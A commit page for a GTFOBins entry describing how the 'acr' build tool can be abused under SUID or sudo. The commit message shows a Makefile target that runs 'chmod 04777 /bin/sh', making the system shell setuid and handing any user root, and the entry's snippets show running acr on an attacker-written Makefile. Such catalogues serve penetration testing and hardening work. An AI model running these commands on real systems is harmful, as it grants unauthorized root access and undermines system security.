GTFOBins.github.io/_gtfobins/acr.md
Albert Llimós 15eb4b376a
Create acr.md
Inside the Makefile :
privesc: 
chmod 04777 /bin/sh

But there is another possibilities, the command above is how i did it
2024-05-02 14:18:58 +02:00

16 lines
342 B
Markdown

---
functions:
suid:
- code: |
sudo install acr $(which acr) .
touch Makefile && chmod + Makefile
echo DATA > Makefile
./acr -r Makefile
sudo:
- code: |
sudo install acr $(which acr) .
touch Makefile && chmod + Makefile
echo DATA > Makefile
sudo acr -r Makefile
---